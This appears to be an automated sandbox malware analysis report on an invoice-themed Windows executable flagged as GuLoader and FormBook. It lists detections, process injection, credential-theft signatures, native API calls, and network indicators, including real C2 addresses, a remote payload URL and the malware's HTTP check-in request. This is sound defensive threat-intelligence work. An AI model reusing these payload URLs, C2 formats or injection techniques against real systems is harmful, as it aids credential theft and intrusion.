Windows Analysis Report
FACTURA PROFORMA MATRICULACI#U00d3N.exe

Overview

General Information

Sample name: FACTURA PROFORMA MATRICULACI#U00d3N.exe
Analysis ID: 1592061
MD5: 66d651e5546dedafd0a252400b70c21d
SHA1: e7d2f22f36489ab390a293bc9e0b048df09675f1
SHA256: 94df904f108f2aa1f8ffdbe2d119ac899fe12e664057792c51662878fdeb21ec

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • FACTURA PROFORMA MATRICULACI#U00d3N.exe (PID: 3248 cmdline: "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe" MD5: 66D651E5546DEDAFD0A252400B70C21D)
    • FACTURA PROFORMA MATRICULACI#U00d3N.exe (PID: 1600 cmdline: "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe" MD5: 66D651E5546DEDAFD0A252400B70C21D)
      • RAVCpl64.exe (PID: 6480 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • rasphone.exe (PID: 4548 cmdline: "C:\Windows\SysWOW64\rasphone.exe" MD5: B5D49238841360E079DA1EC4627684EA)
          • firefox.exe (PID: 524 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet\Reorganisere.Cir | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |

Source | Rule | Description | Author | Strings
00000002.00000002.84398186443.0000000001660000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.84200771924.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000000.00000003.83100054536.00000000029FF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
              No Sigma rule has matched

              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2025-01-15T18:20:23.968838+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49762 | 212.162.149.165 | 80 | TCP
              2025-01-15T18:20:58.019349+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.11.20 | 49763 | 67.223.117.189 | 80 | TCP

              AV Detection

              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeAvira: detected
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeReversingLabs: Detection: 21%
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeVirustotal: Detection: 25%
              Source: Yara matchFile source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: mshtml.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp
              Source: Binary string: wntdll.pdbUGP source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000363AA000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.0000000036552000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp, rasphone.exe, 00000004.00000003.84401648864.0000000004665000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rasphone.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000363AA000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.0000000036552000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp, rasphone.exe, rasphone.exe, 00000004.00000003.84401648864.0000000004665000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rasphone.pdbGCTL source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mshtml.pdbUGP source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 4x nop then mov ebx, 00000004h2_2_3643052F
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h3_2_006DC52F
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h3_2_04912F18
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4x nop then mov ebx, 00000004h4_2_04C1052F

              Networking

              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49763 -> 67.223.117.189:80
              Source: Joe Sandbox ViewIP Address: 67.223.117.189 67.223.117.189
              Source: Joe Sandbox ViewASN Name: VIMRO-AS15189US VIMRO-AS15189US
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49762 -> 212.162.149.165:80
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.165
              Source: global trafficHTTP traffic detected: GET /psKGLMYRljeu25.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: 212.162.149.165Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /qb00/?CQRx1OZ=y6RGjgI4rKy0Y6DzFnE4ds/DujDyIwFNLNdcR+n+evPAM1AFOC6aSjfWGX6bXFIk+vpsjJoo09/MZkArP0uBTPlzJhQmz/zjZXCfq3NAyoUHFZTw2iUqUnI=&arsF=q7myW0OKNmfa9 HTTP/1.1Host: www.flourishno.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
              Source: global trafficDNS traffic detected: DNS query: www.fullhdfilmizlesene.uno
              Source: global trafficDNS traffic detected: DNS query: www.brunokito.cloud
              Source: global trafficDNS traffic detected: DNS query: www.flourishno.life
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 17:20:57 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/html; charset=utf-8
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.165/
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.165/Q
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.bin
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.bin9
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.binE
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414536804.0000000006533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.bino
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366946852.0000000006564000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84414819236.0000000006564000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314914239.0000000006562000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.165/psKGLMYRljeu25.binu
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000000.00000000.83096597469.000000000040A000.00000008.00000001.01000000.00000003.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000000.84196408647.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000626000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
              Source: RAVCpl64.exe, 00000003.00000002.88184446311.0000000005CB8000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
              Source: rasphone.exe, 00000004.00000002.84736393349.00000000029F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
              Source: rasphone.exe, 00000004.00000002.84736393349.00000000029F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
              Source: rasphone.exe, 00000004.00000002.84736393349.00000000029F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: rasphone.exe, 00000004.00000003.84675419748.00000000079FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405705

              E-Banking Fraud

              Source: Yara matchFile source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367734E0 NtCreateMutant,LdrInitializeThunk,2_2_367734E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772EB0 NtProtectVirtualMemory,LdrInitializeThunk,2_2_36772EB0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_36772D10
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772A80 NtClose,LdrInitializeThunk,2_2_36772A80
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772BC0 NtQueryInformationToken,LdrInitializeThunk,2_2_36772BC0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_36772B90
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36774570 NtSuspendThread,2_2_36774570
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36774260 NtSetContextThread,2_2_36774260
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772E50 NtCreateSection,2_2_36772E50
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772E00 NtQueueApcThread,2_2_36772E00
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772ED0 NtResumeThread,2_2_36772ED0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772EC0 NtQuerySection,2_2_36772EC0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772E80 NtCreateProcessEx,2_2_36772E80
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772F30 NtOpenDirectoryObject,2_2_36772F30
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772F00 NtCreateFile,2_2_36772F00
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772FB0 NtSetValueKey,2_2_36772FB0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772C50 NtUnmapViewOfSection,2_2_36772C50
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36773C30 NtOpenProcessToken,2_2_36773C30
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772C30 NtMapViewOfSection,2_2_36772C30
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772C20 NtSetInformationFile,2_2_36772C20
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772C10 NtOpenProcess,2_2_36772C10
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772CF0 NtDelayExecution,2_2_36772CF0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772CD0 NtEnumerateKey,2_2_36772CD0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36773C90 NtOpenThread,2_2_36773C90
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772D50 NtWriteVirtualMemory,2_2_36772D50
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772DC0 NtAdjustPrivilegesToken,2_2_36772DC0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772DA0 NtReadVirtualMemory,2_2_36772DA0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772A10 NtWriteFile,2_2_36772A10
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772AC0 NtEnumerateValueKey,2_2_36772AC0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772AA0 NtQueryInformationFile,2_2_36772AA0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772B20 NtQueryInformationProcess,2_2_36772B20
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772B10 NtAllocateVirtualMemory,2_2_36772B10
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772B00 NtQueryValueKey,2_2_36772B00
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772BE0 NtQueryVirtualMemory,2_2_36772BE0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772B80 NtCreateKey,2_2_36772B80
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367738D0 NtGetContextThread,2_2_367738D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367729F0 NtReadFile,2_2_367729F0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367729D0 NtWaitForSingleObject,2_2_367729D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36443619 NtSetContextThread,2_2_36443619
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36443C5A NtResumeThread,2_2_36443C5A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36443944 NtSuspendThread,2_2_36443944
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_049168F2 SleepEx,NtCreateSection,3_2_049168F2
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_04916A7D SleepEx,NtResumeThread,3_2_04916A7D
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882CF0 NtDelayExecution,LdrInitializeThunk,4_2_04882CF0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882C30 NtMapViewOfSection,LdrInitializeThunk,4_2_04882C30
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_04882D10
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882E50 NtCreateSection,LdrInitializeThunk,4_2_04882E50
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882F00 NtCreateFile,LdrInitializeThunk,4_2_04882F00
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048829F0 NtReadFile,LdrInitializeThunk,4_2_048829F0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882A80 NtClose,LdrInitializeThunk,4_2_04882A80
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882AC0 NtEnumerateValueKey,LdrInitializeThunk,4_2_04882AC0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882A10 NtWriteFile,LdrInitializeThunk,4_2_04882A10
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882B80 NtCreateKey,LdrInitializeThunk,4_2_04882B80
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04882B90
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_04882BC0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882B00 NtQueryValueKey,LdrInitializeThunk,4_2_04882B00
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04882B10
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048834E0 NtCreateMutant,LdrInitializeThunk,4_2_048834E0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04884570 NtSuspendThread,4_2_04884570
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04884260 NtSetContextThread,4_2_04884260
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882CD0 NtEnumerateKey,4_2_04882CD0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882C10 NtOpenProcess,4_2_04882C10
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882C20 NtSetInformationFile,4_2_04882C20
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882C50 NtUnmapViewOfSection,4_2_04882C50
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882DA0 NtReadVirtualMemory,4_2_04882DA0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882DC0 NtAdjustPrivilegesToken,4_2_04882DC0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882D50 NtWriteVirtualMemory,4_2_04882D50
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882E80 NtCreateProcessEx,4_2_04882E80
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882EB0 NtProtectVirtualMemory,4_2_04882EB0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882EC0 NtQuerySection,4_2_04882EC0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882ED0 NtResumeThread,4_2_04882ED0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882E00 NtQueueApcThread,4_2_04882E00
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882FB0 NtSetValueKey,4_2_04882FB0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882F30 NtOpenDirectoryObject,4_2_04882F30
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048829D0 NtWaitForSingleObject,4_2_048829D0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882AA0 NtQueryInformationFile,4_2_04882AA0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882BE0 NtQueryVirtualMemory,4_2_04882BE0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882B20 NtQueryInformationProcess,4_2_04882B20
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04883C90 NtOpenThread,4_2_04883C90
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04883C30 NtOpenProcessToken,4_2_04883C30
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048838D0 NtGetContextThread,4_2_048838D0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_028E97D1 NtClose,4_2_028E97D1
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_028E976B NtDeleteFile,4_2_028E976B
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C1F01D NtQueryInformationProcess,NtReadVirtualMemory,4_2_04C1F01D
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C23628 NtSetContextThread,4_2_04C23628
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C1F026 NtQueryInformationProcess,4_2_04C1F026
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C23C68 NtResumeThread,4_2_04C23C68
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C23F88 NtQueueApcThread,4_2_04C23F88
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C23948 NtSuspendThread,4_2_04C23948
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_0040351C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe File created: C:\Windows\resources\0409
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: String function: 367BEF10 appears 104 times
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: String function: 36775050 appears 36 times
